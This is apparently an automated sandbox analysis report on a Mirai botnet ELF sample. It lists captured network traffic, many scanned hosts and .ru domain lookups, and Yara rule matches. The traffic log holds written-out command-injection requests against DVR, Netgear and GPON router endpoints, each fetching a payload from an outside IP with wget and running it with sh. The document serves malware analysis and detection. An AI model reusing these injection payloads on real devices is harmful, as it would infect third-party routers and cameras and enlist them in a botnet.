Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.96.137Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.57.213Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.157.87.204Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 172.67.167.8Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.158.165.76Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.215Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.130.251.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 84.201.165.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 84.201.165.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.84.89Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 84.201.165.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.188.239.74Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.133.42.146Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 78.108.89.108Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 78.108.89.108Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.109.199.81Connection: close
Source: global traffic DNS traffic detected: DNS query: akak.ru
Source: global traffic DNS traffic detected: DNS query: www.akak.ru
Source: global traffic DNS traffic detected: DNS query: ekac.ru
Source: global traffic DNS traffic detected: DNS query: www.ekac.ru
Source: global traffic DNS traffic detected: DNS query: cbbf.ru
Source: global traffic DNS traffic detected: DNS query: www.cbbf.ru
Source: global traffic DNS traffic detected: DNS query: aabk.ru
Source: global traffic DNS traffic detected: DNS query: www.aabk.ru
Source: global traffic DNS traffic detected: DNS query: bbdl.ru
Source: global traffic DNS traffic detected: DNS query: www.bbdl.ru
Source: global traffic DNS traffic detected: DNS query: fedf.ru
Source: global traffic DNS traffic detected: DNS query: www.fedf.ru
Source: global traffic DNS traffic detected: DNS query: edbf.ru
Source: global traffic DNS traffic detected: DNS query: www.edbf.ru
Source: global traffic DNS traffic detected: DNS query: abae.ru
Source: global traffic DNS traffic detected: DNS query: www.abae.ru
Source: global traffic DNS traffic detected: DNS query: ckea.ru
Source: global traffic DNS traffic detected: DNS query: www.ckea.ru
Source: global traffic DNS traffic detected: DNS query: fckc.ru
Source: global traffic DNS traffic detected: DNS query: www.fckc.ru
Source: global traffic DNS traffic detected: DNS query: dbda.ru
Source: global traffic DNS traffic detected: DNS query: www.dbda.ru
Source: global traffic DNS traffic detected: DNS query: dala.ru
Source: global traffic DNS traffic detected: DNS query: abla.ru
Source: global traffic DNS traffic detected: DNS query: www.abla.ru
Source: global traffic DNS traffic detected: DNS query: bbck.ru
Source: global traffic DNS traffic detected: DNS query: www.dala.ru
Source: global traffic DNS traffic detected: DNS query: www.bbck.ru
Source: global traffic DNS traffic detected: DNS query: afbl.ru
Source: global traffic DNS traffic detected: DNS query: www.afbl.ru
Source: global traffic DNS traffic detected: DNS query: laab.ru
Source: global traffic DNS traffic detected: DNS query: www.laab.ru
Source: global traffic DNS traffic detected: DNS query: bcba.ru
Source: global traffic DNS traffic detected: DNS query: www.bcba.ru
Source: global traffic DNS traffic detected: DNS query: lkcc.ru
Source: global traffic DNS traffic detected: DNS query: www.lkcc.ru
Source: global traffic DNS traffic detected: DNS query: kdac.ru
Source: global traffic DNS traffic detected: DNS query: www.kdac.ru
Source: global traffic DNS traffic detected: DNS query: ebdb.ru
Source: global traffic DNS traffic detected: DNS query: www.ebdb.ru
Source: global traffic DNS traffic detected: DNS query: kddd.ru
Source: global traffic DNS traffic detected: DNS query: www.kddd.ru
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: global traffic DNS traffic detected: DNS query: dfaf.ru
Source: global traffic DNS traffic detected: DNS query: ffal.ru
Source: global traffic DNS traffic detected: DNS query: www.dfaf.ru
Source: global traffic DNS traffic detected: DNS query: www.ffal.ru
Source: global traffic DNS traffic detected: DNS query: felf.ru
Source: global traffic DNS traffic detected: DNS query: www.felf.ru
Source: global traffic DNS traffic detected: DNS query: laea.ru
Source: global traffic DNS traffic detected: DNS query: www.laea.ru
Source: global traffic DNS traffic detected: DNS query: dbee.ru
Source: global traffic DNS traffic detected: DNS query: www.dbee.ru
Source: global traffic DNS traffic detected: DNS query: clbd.ru
Source: global traffic DNS traffic detected: DNS query: www.clbd.ru
Source: global traffic DNS traffic detected: DNS query: dadf.ru
Source: global traffic DNS traffic detected: DNS query: www.dadf.ru
Source: global traffic DNS traffic detected: DNS query: aada.ru
Source: global traffic DNS traffic detected: DNS query: www.aada.ru
Source: global traffic DNS traffic detected: DNS query: dfac.ru
Source: global traffic DNS traffic detected: DNS query: www.dfac.ru
Source: global traffic DNS traffic detected: DNS query: bcka.ru
Source: global traffic DNS traffic detected: DNS query: acaa.ru
Source: global traffic DNS traffic detected: DNS query: www.acaa.ru
Source: global traffic DNS traffic detected: DNS query: www.bcka.ru
Source: global traffic DNS traffic detected: DNS query: clca.ru
Source: global traffic DNS traffic detected: DNS query: www.clca.ru
Source: global traffic DNS traffic detected: DNS query: cale.ru
Source: global traffic DNS traffic detected: DNS query: www.cale.ru
Source: global traffic DNS traffic detected: DNS query: kkdb.ru
Source: global traffic DNS traffic detected: DNS query: www.kkdb.ru
Source: global traffic DNS traffic detected: DNS query: lllf.ru
Source: global traffic DNS traffic detected: DNS query: www.lllf.ru
Source: global traffic DNS traffic detected: DNS query: akbf.ru
Source: global traffic DNS traffic detected: DNS query: www.akbf.ru
Source: global traffic DNS traffic detected: DNS query: fale.ru
Source: global traffic DNS traffic detected: DNS query: www.fale.ru
Source: global traffic DNS traffic detected: DNS query: aafa.ru
Source: global traffic DNS traffic detected: DNS query: www.aafa.ru
Source: global traffic DNS traffic detected: DNS query: debf.ru
Source: global traffic DNS traffic detected: DNS query: www.debf.ru
Source: global traffic DNS traffic detected: DNS query: eckf.ru
Source: global traffic DNS traffic detected: DNS query: www.eckf.ru
Source: global traffic DNS traffic detected: DNS query: afaa.ru
Source: global traffic DNS traffic detected: DNS query: www.afaa.ru
Source: global traffic DNS traffic detected: DNS query: adla.ru
Source: global traffic DNS traffic detected: DNS query: www.adla.ru
Source: global traffic DNS traffic detected: DNS query: fkfa.ru
Source: global traffic DNS traffic detected: DNS query: www.fkfa.ru
Source: global traffic DNS traffic detected: DNS query: bebe.ru
Source: global traffic DNS traffic detected: DNS query: www.bebe.ru
Source: global traffic DNS traffic detected: DNS query: fecb.ru
Source: global traffic DNS traffic detected: DNS query: www.fecb.ru
Source: global traffic DNS traffic detected: DNS query: bcda.ru
Source: global traffic DNS traffic detected: DNS query: lkfd.ru
Source: global traffic DNS traffic detected: DNS query: www.lkfd.ru
Source: global traffic DNS traffic detected: DNS query: www.bcda.ru
Source: global traffic DNS traffic detected: DNS query: lkck.ru
Source: global traffic DNS traffic detected: DNS query: www.lkck.ru
Source: global traffic DNS traffic detected: DNS query: ffcb.ru
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.37Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: firmware.armv4l.elf, type: SAMPLE Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5499.1.00007ff29c017000.00007ff29c032000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5501.1.00007ff29c017000.00007ff29c032000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5490.1.00007ff29c017000.00007ff29c032000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: /usr/bin/mabxpzyo, type: DROPPED Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: dropped/mabxpzyo, type: DROPPED Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Yara signature match
Source: firmware.armv4l.elf, type: SAMPLE Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
